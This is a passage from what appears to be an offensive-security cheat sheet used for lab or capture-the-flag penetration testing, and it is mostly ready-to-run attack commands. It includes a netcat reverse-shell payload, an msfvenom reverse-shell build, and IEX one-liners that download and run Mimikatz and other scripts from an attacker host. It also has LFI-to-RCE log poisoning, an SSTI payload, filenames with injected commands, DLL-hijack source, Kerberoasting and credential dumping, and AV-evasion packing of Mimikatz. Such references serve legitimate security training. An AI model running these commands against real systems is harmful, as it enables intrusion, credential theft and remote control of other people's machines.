| #Example 1 749 | python3 jsonbrute.py --url http://localhost/v2/login --wordlist rockyou.txt --data "username=user, password=FUZZ" --code 200 750 | 751 | #Example 2 752 | python3 jsonbrute.py --url http://localhost/api/login --wordlist rockyou.txt --data "username=admin, password=FUZZ, recaptcha= " --code 200 --verbose 753 | ``` 754 | 755 | ### Wfuzz 756 | 757 | ```bash 758 | #PROXY (-p) 759 | wfuzz -u http://localhost/authenticate -w test.txt -d "uname=admin&psw=FUZZ&remember=on" -p 127.0.0.1:8080 -H "Referer: http://localhost/authenticate" 760 | 761 | #COOKIES (-b) 762 | wfuzz -u http://localhost/admin/FUZZ.php -w big.txt -b PHPSESSID=1e28or9cmi6ua05d78tov7j7t4 --hc 404 763 | 764 | #POST & output in url (/?login=username_incorrect) 765 | wfuzz -u http://localhost/login -w users.txt -w pass.txt -d "username=FUZZ&password=FUZ2Z" 766 | ``` 767 | 768 | ### Gobuster 769 | 770 | ```bash 771 | # Commands 772 | 773 | # Subdomain/Vhost 774 | gobuster vhost -r --url http://bank.local/ --wordlist subdomains-top1million-110000.txt -t 50 775 | gobuster vhost -k -r --url https://bank.local/ --wordlist subdomains-top1million-110000.txt -t 50 776 | ``` 777 | 778 | ### Vault 779 | 780 | ```bash 781 | # Commands 782 | vault kv list ssh/roles/ 783 | vault kv get secret/creds 784 | vault kv put secret/creds passcode=my-long-passcode 785 | vault ssh -mode=otp -role=my-role root@localhost 786 | 787 | # References 788 | https://www.vaultproject.io/ 789 | https://www.vaultproject.io/docs/commands/ssh 790 | ``` 791 | 792 | ### Ffuf 793 | 794 | ```bash 795 | # Install 796 | 797 | # Commands 798 | ffuf -u 'http://10.10.10.10/FUZZ' -w common.txt:FUZZ -e .php,.html,.txt,.bak -t 50 799 | ffuf -u 'https://FUZZ.bank.local' -w subdomains-top1million-20000.txt:FUZZ -t 30 800 | ffuf -u 'http://10.10.10.10/' -w sqli.txt:FUZZ -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=FUZZ" -fc 200 801 | ffuf -u 'https://10.10.10.10/FUZZ' -w common.txt:FUZZ -e .txt -t 1 
-fs 1508 -fl 4 802 | 803 | # Subomdina/Vhost 804 | ffuf -ic -c -u "http://bank.local/" -H "Host: FUZZ.bank.local" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -fc 301 805 | 806 | # POST Method 807 | ffuf -u 'http://10.10.10.10/main/wp-login.php' -w user.txt:USER -w pass.txt:PASS -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "log=USER&pwd=PASS&wp-submit=Log+In" 808 | ffuf -u 'http://10.10.10.10/login.php' -w user.txt:FUZZ -w pass.txt:FUZ2Z -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "user=FUZZ&pass=FUZ2Z" --fc 200 809 | ffuf -u 'http:/10.10.10.10/login.php' -w user.txt:FUZZ -w pass.txt:FUZ2Z -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "user=FUZZ&pass=FUZ2Z" 810 | 811 | # With Cookie 812 | ffuf -u "http://10.10.10.10/FUZZ" -w common.txt:FUZZ -t 1 -b "cookie1=asdasdasd;cookie2=asdasdasd" 813 | 814 | # Timeout 815 | ffuf -u "http://10.10.10.10/FUZZ" -w common.txtt:FUZZ -e .txt,.html -t 1 -timeout 40 -fs 200 816 | 817 | # With proxy 818 | ffuf -u 'http://10.10.10.10/FUZZ' -w common.txt:FUZZ -t 30 -e .php,.html,.txt -x http://10.10.10.10:3128 819 | ``` 820 | 821 | ### Uploading Files 822 | 823 | ```bash 824 | Change content-type 825 | * text/html 826 | * image/gif 827 | * image/jpeg 828 | extension 829 | * .png.php 830 | * .php.png 831 | * .php%00.png 832 | * .phtml 833 | 834 | # Php content 835 | 836 | ``` 837 | 838 | ### Local File Inclusion (LFI) 839 | 840 | ```bash 841 | # References 842 | -> https://book.hacktricks.xyz/pentesting-web/file-inclusion 843 | 844 | ===PHP Wrapper=== 845 | php://filter/convert.base64-encode/resource=index.php 846 | pHp://FilTer/convert.base64-encode/resource=index.php 847 | php://filter/read=string.rot13/resource=index.php 848 | 849 | =======Linux====== 850 | # Wordlists 851 | /var/log/mail.log 852 | /etc/passwd 853 | /etc/ldap.secret 854 | /etc/shadow 855 | /etc/hosts 856 | /etc/knockd.conf 857 | /etc/exports 858 | /proc//cmdline 859 | 860 | 
=======LFI To RCE======== 861 | #-----[/var/log/mail.log]----- 862 | nc 10.10.10.10 25 863 | 864 | HELO test 865 | MAIL FROM: "test " 866 | RCPT TO: root 867 | DATA 868 | . 869 | #RCE 870 | ?page=/var/log/mail&cmd=ls -la 871 | 872 | #-----[/var/log/apache2/access.log]----- 873 | curl http://10.10.10.10 -A '' 874 | 875 | #RCE 876 | ?book=../../../../../../var/log/apache2/access.log&cmd=ls -la 877 | 878 | #-----[/var/mail/USER]----- 879 | nc 10.10.10.10 25 880 | 881 | HELO test 882 | MAIL FROM: www-data@solstice 883 | RCPT TO:www-data@solstice 884 | DATA 885 | 886 | . 887 | #RCE 888 | ?book=../../../../../../var/mail/www-data&cmd=ls -la 889 | 890 | ======Windows====== 891 | # Wordlists 892 | C:/windows/win.ini 893 | C:/windows/system.ini 894 | C:/windows/bootstat.dat 895 | C:/Program Files/Windows NT/Accessories/WordpadFilter.dll 896 | C:/Program Files/Common Files/mirosoft shared/Web Server Extensions//BIN/FPWEC.DLL 897 | C:/Program Files/Exchsrvr/MDBDATA/Privi.edb 898 | C:/inetpub/wwwroot/iisstart.htm 899 | C:/windows/Microsoft.NET/Framework64//vbc.exe.config 900 | C:/windows/Microsoft.NET/Framework64//Config/web.config 901 | C:/windows/System32/drivers/etc/hosts 902 | C:/windows/System32/drivers/acpi.sys 903 | C:/windows/System32/drivers/etc/networks 904 | C:/Users//Desktop/Desktop.ini 905 | C:/windows/debug/NetSetup.log 906 | C:/windows/debug/mrt.log 907 | C:/windows/system32/inetsrv/config/schema/ASPNET_schema.xml 908 | 909 | # Refrences (Windows Wordlists) 910 | - https://github.com/random-robbie/bruteforce-lists/blob/master/windows-lfi.txt 911 | 912 | # ASP.Net 913 | ../../web.config 914 | ../../Images/image.jpg 915 | ../../packages.config 916 | ../../Global.asax 917 | ../../Views/web.config 918 | ../../Content/bootstrap_dropdown.css 919 | ../../Content/Site.css 920 | ../../Views/_ViewStart.cshtml 921 | ../../Views/_ViewStart.aspx 922 | ../../Views/_ViewStart.ascx 923 | ../../Views/Shared/Error.cshtml 924 | ../../Views/Shared/Error.aspx 925 | 
../../Views/Shared/Error.ascx 926 | ../../Views/Home/Index.cshtml 927 | ../../Views/Home/Index.aspx 928 | ../../Views/Home/Index.ascx 929 | ../../bin/.dll 930 | 931 | # Grep Use in web.config 932 | grep -Ri namespace | grep -v namespaces | cut -d'"' -f 1-2 933 | grep -Ri assemblyidentity | cut -d'"' -f 1-2 934 | grep -ri " type=" | grep -v compiler | cut -d'"' -f 1-4 935 | 936 | # References (ASP.Net) 937 | - https://digi.ninja/blog/when_all_you_can_do_is_read.php 938 | - https://www.c-sharpcorner.com/UploadFile/3d39b4/folder-structure-of-Asp-Net-mvc-project/ 939 | - https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html 940 | - https://raw.githubusercontent.com/xajkep/wordlists/master/discovery/asp_files_only.txt 941 | - http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html 942 | ``` 943 | 944 | ### ASP.NET MVC Folder Structure 945 | 946 | ```bash 947 | # ASP.NET MVC Folder Structure 948 | MyFirstProject 949 | - Properties 950 | - AssemblyInfo.cs 951 | - App_Data 952 | - 953 | - App_Start 954 | - 955 | - Content 956 | - Site.css 957 | - Controllers 958 | - 959 | - fonts 960 | - 961 | - Models 962 | - 963 | - Scripts 964 | - something.js 965 | - Views 966 | - Index.cshtml/Index.aspx/Index.ascx 967 | - web.config 968 | - bin 969 | - something.dll 970 | - Images 971 | - 972 | - favicon.ico 973 | - Global.asax 974 | - packages.config 975 | - web.config 976 | 977 | # References 978 | - https://www.tutorialsteacher.com/mvc/mvc-folder-structure 979 | - https://github.com/DLarsen/Learn-ASP.NET-MVC 980 | ``` 981 | 982 | ### Checklists 983 | 984 | ``` 985 | # .Net Website Security Guidelines Checklists 986 | https://www.codeguru.com/columns/kate/.net-website-security-guidelines-checklist.html 987 | ``` 988 | 989 | ### Remote Command Execution (RCE) 990 | 991 | ```bash 992 | # Payload Command Execution 993 | '$(nc -e /bin/bash 192.168.149.129 4444)' 994 | "$(printf 'aaa\n/bin/sh\nls')" 995 | () { :;}; /bin/bash 996 | 997 | 
# Date 998 | %H:%M:%S';cat ../flag;# 999 | %H';date -f '../flag 1000 | %H' -f '../flag 1001 | ``` 1002 | 1003 | ### Server-Side Template Injection (SSTI) 1004 | 1005 | ```bash 1006 | => References 1007 | $ https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection 1008 | 1009 | => Nunjucks 1010 | {{range.constructor(\"return global.process.mainModule.require('child_process').execSync('id')\")()}} 1011 | ``` 1012 | 1013 | ### Broken Access Control 1014 | 1015 | ```bash 1016 | => Look at robots.txt 1017 | => Check javascript (urls,endpoints) 1018 | => Check parameter (functionality -> role,modified) 1019 | => URL-based (403 bypass) 1020 | -> X-Original-URL : /admin/deleteUser 1021 | -> X-Rewrite-URL : /admin/deleteUser 1022 | => Try every Method (403 bypass) 1023 | => IDOR 1024 | => Check other user ID (unpredictable) 1025 | => Check response before redirect 1026 | => Check every step of functionality (multi-step) if its affected with broken access control. 1027 | => Referer-based (Add Referer Header) 1028 | 1029 | => References 1030 | $ https://portswigger.net/web-security/access-control 1031 | $ https://infosecwriteups.com/begineers-crash-course-for-finding-access-control-vulnerabilities-in-the-web-apps-part-1-5b61cf4396c4 1032 | $ https://infosecwriteups.com/begineers-crash-course-for-finding-access-control-vulnerabilities-in-the-web-apps-part-2-ce38eabfb81a 1033 | 1034 | ``` 1035 | 1036 | ### Socat 1037 | 1038 | ```bash 1039 | socat tcp-listen:8009,fork tcp:192.168.56.104:8009 & 1040 | socat tcp-listen:8080,fork tcp:192.168.56.104:8080 & 1041 | socat tcp-listen:34483,fork tcp:192.168.56.104:34483 & 1042 | socat tcp-listen:4321,fork tcp:192.168.56.104:4321 & 1043 | ``` 1044 | 1045 | ### PyJWT 1046 | 1047 | ```bash 1048 | => Install 1049 | $ pip install PyJWT 1050 | 1051 | => Commands 1052 | $ import jwt 1053 | $ encoded = jwt.encode({"username": "o5yY6yya", "exp" : 1690896507}, "", algorithm="HS256") 1054 | $ encoded 1055 | 1056 | => References 
1057 | $ https://github.com/jpadilla/pyjwt 1058 | $ https://www.epochconverter.com/ 1059 | ``` 1060 | 1061 | ### tcpdump 1062 | 1063 | ```bash 1064 | # Command 1065 | tcpdump -i lo -w /tmp/write.pcap 1066 | ``` 1067 | 1068 | ### Chisel 1069 | 1070 | ```bash 1071 | # Chisel 1072 | https://github.com/jpillora/chisel 1073 | 1074 | ## Client Machine 1075 | ./chisel client 10.66.67.154:8000 R:25:127.0.0.1:25 1076 | ./chisel client 10.66.67.130:8000 R:8080:127.0.0.1:8080 1077 | ./chisel client 10.10.10.10:8001 R:1080:socks 1078 | 1079 | ## Attacker Machine 1080 | ./chisel server -p 8000 --reverse 1081 | 1082 | # Add this in /etc/proxychains4.conf 1083 | socks5 127.0.0.1 1080 1084 | ``` 1085 | 1086 | ### Ping Sweep 1087 | 1088 | ```bash 1089 | #!/bin/bash 1090 | 1091 | for i in {1..255}; do 1092 | if out=$(ping -c 1 10.10.10.$i); then 1093 | echo "$out" | grep ttl | cut -d " " -f4 | cut -d ":" -f1 1094 | echo "$out" | grep ttl | cut -d " " -f4 | cut -d ":" -f1 >> ip.txt 1095 | fi 1096 | done 1097 | ``` 1098 | 1099 | ### Stegseek 1100 | 1101 | ```bash 1102 | # Downloads 1103 | https://github.com/RickdeJager/stegseek 1104 | 1105 | # Commands 1106 | stegseek [stegofile.jpg] [wordlist.txt] 1107 | stegeek a.jpg rockyou.txt 1108 | ``` 1109 | 1110 | ### Binwalk 1111 | ```bash 1112 | # Download/Install 1113 | https://github.com/ReFirmLabs/binwalk 1114 | sudo apt-get install -y binwalk 1115 | 1116 | # Commands 1117 | binwalk --signature firmware.bin 1118 | binwalk -A firmware.bin 1119 | 1120 | # References 1121 | - https://github.com/ReFirmLabs/binwalk/wiki/Usage 1122 | ``` 1123 | 1124 | ### Crunch 1125 | 1126 | ```bash 1127 | #options (-t) 1128 | => crunch 5 5 -t @@@@@ -o alphabet.txt 1129 | @ will insert lower case characters 1130 | , will insert upper case characters 1131 | % will insert numbers 1132 | ^ will insert symbols 1133 | ``` 1134 | 1135 | ### Kwprocessor 1136 | 1137 | ```bash 1138 | # Download 1139 | https://github.com/hashcat/kwprocessor 1140 | 1141 | # Commands 1142 
| ./kwp basechar.txt keymap.txt route.txt 1143 | ./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-changes.route 1144 | ``` 1145 | 1146 | ### Procdump 1147 | 1148 | ```bash 1149 | # Download 1150 | https://docs.microsoft.com/en-us/sysinternals/downloads/procdump 1151 | 1152 | # Usage 1153 | .\procdump64.exe -accepteula 1154 | .\procdump64.exe -ma 1155 | ``` 1156 | 1157 | ### Hashcat 1158 | 1159 | ```bash 1160 | # Command 1161 | hashcat -m 3200 hash wordlist.txt -r best64.rule 1162 | hashcat -m 1000 hash wordlist.txt -r all4one.rule --show --username 1163 | ``` 1164 | 1165 | ### Cauldera 1166 | 1167 | ```bash 1168 | # Github 1169 | https://github.com/aaronjones111/cauldera 1170 | 1171 | # Command 1172 | ``` 1173 | 1174 | ### AWS 1175 | 1176 | ```bash 1177 | ======AWS CLI====== 1178 | # Install 1179 | 1180 | # Commands 1181 | aws s3 ls s3://bucketname 1182 | aws s3 cp file.txt s3://bucketname 1183 | aws s3 rm s3://bucketname/file.txt 1184 | aws s3 ls s3://bucketname/ --no-sign-request --region cn-northwest-1 1185 | aws s3 mv file.txt s3://bucketname 1186 | aws s3 cp s3://bucketname/file.txt . --no-sign-request --region cn-northwest-1 1187 | 1188 | # References 1189 | - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/AWS%20Amazon%20Bucket%20S3/README.md 1190 | ``` 1191 | 1192 | ### PrivescCheck.ps1 1193 | 1194 | ```bash 1195 | # Download 1196 | wget https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1 1197 | 1198 | # Get File from Victim Machine 1199 | wget http://10.10.14.16:80/PrivescCheck.ps1 -outfile PrivescCheck.ps1 1200 | 1201 | # Commands 1202 | . 
.\PrivescCheck.ps1 1203 | Invoke-PrivescCheck 1204 | 1205 | # Directly 1206 | IEX(IWR http://10.10.10.10/PrivescCheck.ps1 -UseBasicParsing); Invoke-PrivescCheck 1207 | ``` 1208 | 1209 | ### Invoke-ReflectivePEInjection 1210 | 1211 | ```bash 1212 | # Downloads 1213 | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-ReflectivePEInjection.ps1 1214 | 1215 | # Commands 1216 | $c = "C:/patho/execute.dll" 1217 | $PEBytes = [IO.File]::ReadAllBytes($c) 1218 | Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local 1219 | ``` 1220 | 1221 | ### Windows-Exploit-Suggester 1222 | 1223 | ```bash 1224 | # Download 1225 | wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py 1226 | 1227 | # Commands 1228 | python windows-exploit-suggester.py --update 1229 | python windows-exploit-suggester.py -i systeminfo.txt -d 2021-04-23-mssb.xls 1230 | ``` 1231 | 1232 | ### Sysinternals 1233 | 1234 | ```bash 1235 | =====List 1236 | .\Listdlls64.exe dllhijackservice 1237 | 1238 | # References 1239 | https://docs.microsoft.com/en-us/sysinternals/downloads/ 1240 | ``` 1241 | 1242 | ### Just Another Windows (Enum) Script (JAWS) 1243 | 1244 | ```bash 1245 | # Download 1246 | https://github.com/411Hall/JAWS.git 1247 | 1248 | # Commands 1249 | IEX(New-Object Net.WebClient).downloadString('http://10.10.10.10/jaws-enum.ps1') 1250 | . 
.\jaws-enum.ps1 1251 | ``` 1252 | 1253 | ### WebDav 1254 | 1255 | ```bash 1256 | # Commands 1257 | davtest -url http://10.10.10.15 1258 | cadaver http://10.10.10.15/ 1259 | * put shell.txt 1260 | * move shell.txt shell.aspx 1261 | ``` 1262 | 1263 | ### Threader3000 1264 | 1265 | ```bash 1266 | # Install 1267 | pip3 install threader3000 1268 | 1269 | # Commands 1270 | threader3000 1271 | 1272 | # One Liner 1273 | for i in $(cat ip.txt); do echo "["$i"]" >> port.txt; echo "" >> port.txt;echo $i | threader3000 | grep "open" >> port.txt; echo "" >> port.txt;done 1274 | 1275 | # References 1276 | - https://github.com/dievus/threader3000 1277 | ``` 1278 | 1279 | ### Seatbelt.exe 1280 | 1281 | ```bash 1282 | # Download 1283 | https://github.com/r3motecontrol/Ghostpack-CompiledBinaries 1284 | 1285 | # Usage 1286 | Seatbelt.exe -group=all 1287 | ``` 1288 | 1289 | ### File Transfer 1290 | 1291 | ```bash 1292 | # SMB 1293 | - Create one folder name profile (mkdir profile) 1294 | - sudo /opt/Tools/impacket/examples/smbserver.py items profile 1295 | - net view \\10.10.10.10 1296 | - copy items.db \\10.10.10.10\ITEMS\items.db 1297 | 1298 | # References 1299 | https://medium.com/@PenTest_duck/almost-all-the-ways-to-file-transfer-1bd6bf710d65 1300 | ``` 1301 | 1302 | ### Firefox Decrypt 1303 | 1304 | ```bash 1305 | # Download 1306 | https://github.com/unode/firefox_decrypt.git 1307 | 1308 | # Usage 1309 | - Ensure that these files in the folder 1310 | * logins.json 1311 | * cookies.sqlite 1312 | * key4.db 1313 | * cert9.db 1314 | - python3 firefox_decrypt.py /opt/Training/Gatekeeper/profile 1315 | ``` 1316 | 1317 | ### John The Ripper 1318 | 1319 | ```bash 1320 | # Pdf2john 1321 | perl /usr/share/john/pdf2john.pl example.pdf > hash 1322 | 1323 | # Commands 1324 | john hash --wordlist=rockyou.txt 1325 | john hash --show 1326 | ``` 1327 | 1328 | ### Firefox Addons 1329 | 1330 | ```bash 1331 | # FoxyProxy 1332 | https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ 1333 
| 1334 | # X-Forwarded For Injector 1335 | https://addons.mozilla.org/en-US/firefox/addon/x-forwarded-for-injector/ 1336 | ``` 1337 | 1338 | ### Sshuttle 1339 | 1340 | ```bash 1341 | # Commands 1342 | sshuttle -vr sshuser@10.10.10.10 192.168.0.1/24 1343 | sshuttle -vr sshuser@10.10.10.10 -e "ssh -i id_rsa" 192.168.0.1/24 1344 | sshuttle -vr sshuser@10.10.10.10 192.168.0.1/16 1345 | ```` 1346 | 1347 | ### Pwsh 1348 | 1349 | ```bash 1350 | # Downloads/Install 1351 | https://docs.microsoft.com/en-us/powershell/scripting/install/installing-powershell-core-on-linux?view=powershell-7.1 1352 | ``` 1353 | 1354 | ### Invoke-Mimikatz.ps1 1355 | 1356 | ```bash 1357 | # Downloads 1358 | https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1 1359 | 1360 | # Commands 1361 | powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" 1362 | Invoke-Mimikatz -DumpCreds 1363 | ``` 1364 | 1365 | ### Mimikatz.exe 1366 | 1367 | ```bash 1368 | # Run 1369 | .\mimikatz.exe 1370 | 1371 | # Commands 1372 | 1373 | # References 1374 | https://github.com/gentilkiwi/mimikatz/releases 1375 | ``` 1376 | 1377 | ### Invoke-Kerberoast.ps1 1378 | 1379 | ```bash 1380 | # Download 1381 | https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1 1382 | 1383 | # Commands 1384 | Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat 1385 | Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | out-file hash.txt -Width 8000 1386 | ``` 1387 | ### Sharphound.ps1 1388 | 1389 | ```code 1390 | # Downloads 1391 | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1 1392 | 1393 | # Commands 1394 | Invoke-Bloodhound -CollectionMethod All -Domain bank.local 1395 | Invoke-Bloodhound -CollectionMethod All 1396 | Invoke-Bloodhound 
-CollectionMethod All -ZipFileName test.zip 1397 | ``` 1398 | 1399 | ### SharpHound.exe 1400 | 1401 | ```bash 1402 | # Commands 1403 | /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe 1404 | ``` 1405 | 1406 | ### PEzor 1407 | 1408 | ```bash 1409 | => Download 1410 | $ https://github.com/phra/PEzor 1411 | 1412 | => Commands 1413 | $ sudo bash install.sh 1414 | $ ./PEzor.sh -format=exe mimikatz.exe -z 2 -p '"lsadump::dcsync /domain:spookysec.local /user:krbtgt" "exit"' 1415 | $ ./PEzor.sh -format=exe mimikatz.exe -z 2 -p '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"' 1416 | 1417 | => References 1418 | $ 1419 | ``` 1420 | 1421 | ### jq 1422 | 1423 | ```code 1424 | # Install 1425 | sudo apt install jq 1426 | 1427 | # Example 1428 | cat 20210606133816_users.json | jq '.users[] | .Properties["name"]' 1429 | 1430 | # References 1431 | https://lzone.de/cheat-sheet/jq 1432 | 1433 | ``` 1434 | 1435 | ### Windows Privesc Escalation 1436 | 1437 | ```bash 1438 | ========Unquoted Service Path======== 1439 | -> Check if there is quote or not (") 1440 | -> Check if the directory is writable or not 1441 | -> Check if the service can be restart or not. 
1442 | wmic service get name,pathname,displayname,startmode | findstr /i /v "C:\Windows\\" | findstr /i /v """ 1443 | icacls "C:\Program Files\Unquoted Path Service\Common Files" 1444 | sc query "unquotedsvc" 1445 | accesschk.exe -ucqv unquotedsvc 1446 | msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=9001 -f exe > Common.exe 1447 | sc stop unquotedsvc 1448 | sc start unquotedsvc 1449 | sc qc unquotedsvc 1450 | 1451 | ## Unquoted Service Path (Mitigate) 1452 | Get-ItemProperty HKLM::\SYSTEM\CurrentControlSet\Services\unquotedsvc 1453 | (Get-ItemProperty HKLM::\SYSTEM\CurrentControlSet\Services\unquotedsvc).ImagePath 1454 | Set-ItemProperty HKLM::\SYSTEM\CurrentControlSet\Services\unquotedsvc -Name ImagePath -Value '"C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe"' 1455 | sc config unquotedsvc binPath= "\"C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe\"" 1456 | 1457 | ## References (Unquoted Service Path) 1458 | https://www.techiessphere.com/2017/06/how-to-fix-unquoted-service-path-vulnerability.html?m=1 1459 | https://github.com/VectorBCO/windows-path-enumerate/ 1460 | 1461 | ========Dll Hijacking======== 1462 | -> Check if there is a missing Dll which cannot be loaded (NAME NOT FOUND) 1463 | -> Check if the path to the Dll is writable or not 1464 | -> Check if the service can be restart or not. 
1465 | wmic service get name,pathname,displayname,startmode | findstr /i /v "C:\Windows\\" 1466 | sc query dllsvc 1467 | sc queryex dllsvc 1468 | sc stop dllsvc 1469 | sc start dllsvc 1470 | taskkil /F /PID /8080 1471 | 1472 | ## windows_dll.c 1473 | #include 1474 | 1475 | BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) { 1476 | if (dwReason == DLL_PROCESS_ATTACH) { 1477 | system("cmd.exe /k whoami > C:\\Temp\\imhere.txt"); 1478 | ExitProcess(0); 1479 | } 1480 | return TRUE; 1481 | } 1482 | 1483 | # x86 1484 | i686-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll 1485 | 1486 | # x64 1487 | x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll 1488 | 1489 | ## References (Dll Hijacking) 1490 | https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking 1491 | 1492 | ========Service binPath======== 1493 | 1494 | ## References (Changing Service Configuration) 1495 | https://www.ired.team/offensive-security/privilege-escalation/weak-service-permissions 1496 | 1497 | ========Others======== 1498 | 1499 | # References 1500 | https://gist.github.com/sckalath/8dacd032b65404ef7411 1501 | https://github.com/ankh2054/windows-pentest 1502 | ``` 1503 | 1504 | ### Linux Commands 1505 | 1506 | ```code 1507 | => Remove First Character 1508 | $ echo "xtest" | cut -c2- 1509 | 1510 | => Remove the first occurence character 1511 | $ echo $i | sed 's@/@@' # Remove '/' 1512 | 1513 | => Remove the first / if got 1514 | $ for i in $(cat wordlist.txt);do if [[ $i == /* ]]; then echo $i | sed 's@/@@'; else echo $i; fi;done 1515 | 1516 | => Loop and read from file (line by line) 1517 | $ while IFS= read -r line; do echo "$line" ; done < word.txt 1518 | 1519 | => xxd 1520 | $ xxd notes.txt 1521 | $ echo "62006600610038003100300034007d000d000a00" | xxd -r -p 1522 | 1523 | => Add new user 1524 | $ sudo useradd username 1525 | $ sudo useradd -d /opt/home username 1526 | $ sudo useradd -u 1002 username 1527 | $ sudo useradd -u 1002 -g 500 
username 1528 | $ sudo useradd -u 1002 -G admins,webadmins,dev username 1529 | $ sudo useradd -M username 1530 | $ sudo useradd -e 2021-10-10 username 1531 | $ sudo useradd -e 2021-10-10 -f 50 username 1532 | $ sudo useradd -c "New User 2021" username 1533 | $ sudo useradd -s /sbin/nologin username 1534 | 1535 | => Add to sudo group 1536 | $ sudo usermod -aG sudo username 1537 | 1538 | => Mount 1539 | $ mkdir mount; sudo mount //10.10.10.10/Drive mount/ -o username=”nik”,password=”Passw0rd@123!” 1540 | 1541 | => ntpdate 1542 | $ ntpdate 10.10.10.10.10 1543 | 1544 | => net 1545 | $ net time set -S 10.10.10.10 1546 | 1547 | => Conversion 1548 | echo $((0x9f)) 1549 | 1550 | => Remove From sudo group 1551 | $ sudo deluser username sudo 1552 | ``` 1553 | 1554 | ### Cisco Type 7 Password Decrypter 1555 | 1556 | ```bash 1557 | # Download 1558 | https://github.com/theevilbit/ciscot7 1559 | 1560 | # Usage 1561 | python3 ciscot7.py -p "0242114B0E143F015F5D1E161713" 1562 | 1563 | # Example Password Encrypted 1564 | 0242114B0E143F015F5D1E161713 1565 | ``` 1566 | 1567 | ### Linux Alias 1568 | 1569 | ```code 1570 | alias rot13="tr 'A-Za-z' 'N-ZA-Mn-za-m'" 1571 | * echo "a" | rot13 1572 | alias urldecode='sed "s@+@ @g;s@%@\\\\x@g" | xargs -0 printf "%b"' 1573 | * echo 'P%40%24%24w0rd' | urldecode 1574 | alias base64w='iconv --to-code UTF-16LE | base64 -w 0' 1575 | * echo whoami | base64w 1576 | alias hex='xxd -p' 1577 | * echo -n "hello" | hex 1578 | * while read line; do echo $line | hex | tr "\n" " " | sed 's/ //g';echo; done < payload.txt 1579 | ``` 1580 | 1581 | ### Pentest List 1582 | 1583 | ```bash 1584 | => User Enumeration 1585 | $ https://www.vaadata.com/blog/user-enumerations-on-web-applications/ 1586 | $ https://www.rapid7.com/blog/post/2017/06/15/about-user-enumeration/ 1587 | 1588 | => Directory Listing 1589 | $ https://cwe.mitre.org/data/definitions/548.html 1590 | 1591 | => File upload 1592 | $ 
https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload 1593 | 1594 | => SQL Injection 1595 | $ https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html 1596 | $ https://owasp.org/www-community/attacks/SQL_Injection 1597 | $ https://portswigger.net/web-security/sql-injection 1598 | 1599 | => Sensitive Information 1600 | $ https://cwe.mitre.org/data/definitions/200.html 1601 | $ https://owasp.org/www-project-top-ten/2017/A3_2017-Sensitive_Data_Exposure 1602 | $ https://cwe.mitre.org/data/definitions/359.html 1603 | $ https://cyberintelligencehouse.com/exposure/disclosure-of-sensitive-information-and-exposure-enables-phishing 1604 | $ https://portswigger.net/web-security/information-disclosure 1605 | 1606 | => Zip Password 1607 | $ https://github.com/jingleyang/security_ctf/blob/master/hacking-lab.com/5020%20Password%20protected%20ZIP%20Writeup.md 1608 | 1609 | => Local File Inclusion (LFI) 1610 | $ https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion 1611 | $ https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/ 1612 | $ https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/ 1613 | 1614 | => Source Code Disclosure 1615 | $ https://portswigger.net/kb/issues/006000b0_source-code-disclosure 1616 | $ https://www.acunetix.com/blog/articles/source-code-disclosure-dangerous/ 1617 | ``` 1618 | 1619 | ### File Upload 1620 | 1621 | ```bash 1622 | # RCE in Filename 1623 | file$(whoami).jpg 1624 | file`whoami`.jpg 1625 | file;sleep 30;.jpg 1626 | 1627 | # References 1628 | https://www.onsecurity.io/blog/file-upload-checklist/ 1629 | https://book.hacktricks.xyz/pentesting-web/file-upload 1630 | ``` 1631 | 1632 | ### Static Binaries (Linux) 1633 | 1634 | ```bash 1635 | 1636 | ``` 1637 | 1638 | ### PowerShell Commands 1639 | 1640 | ```powershell 1641 | => Show Process 1642 | $ ps 
